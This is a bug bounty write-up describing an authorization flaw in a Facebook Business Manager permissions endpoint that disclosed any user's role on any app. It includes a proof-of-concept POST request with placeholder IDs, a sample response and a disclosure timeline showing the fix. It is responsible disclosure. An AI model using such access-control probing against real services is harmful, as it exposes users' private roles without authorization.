Determine users with detailed role model on behalf of any Facebook Application
A year later from my previous findings I wished to revisit business manager. A lot of changes have been made. This bug is quite similar to previous Disclose App Admins.
"/business/objects/fetch/permissions/users/"
endpoint is used to fetch which permissions users have on asset type pages/apps etc. Meantime, call for asset type “Pages” were secured but was vulnerable for the asset type “apps”.
Based on the given input for the targeted app and targeted user id, It is possible to disclose what type of role users have with permission details. This bug also was unrestricted. (regardless of the app assigned in the business manager account or not)
Proof of concept
Request:
POST /business/objects/fetch/permissions/users/ HTTP/1.1
Host: business.facebook.com
asset_id=TARGET_APP_ID
asset_type=app
user_id=TARGET_USER_FB_ID
business_id=ATTACKER_BUSINESS_ID
Response:
{
"payload": {
"aggregatedPermissions": [
"111xxxxxx9",
"123xxxxxx9",
"456xxxxxx9",
"789xxxxxx9"
],
"worksetPermissions": {}
}
}
Impact
Disclose the admin/developer roles for any app if know one of the developer’s profile.
Timeline
- 15 Dec, 2019 – Report Sent.
- 18 Dec, 2019 – Further investigation by Facebook.
- 09 Jan, 2020 – Fixed by Facebook.
- 15 Jan, 2020 – Bounty Awarded by Facebook.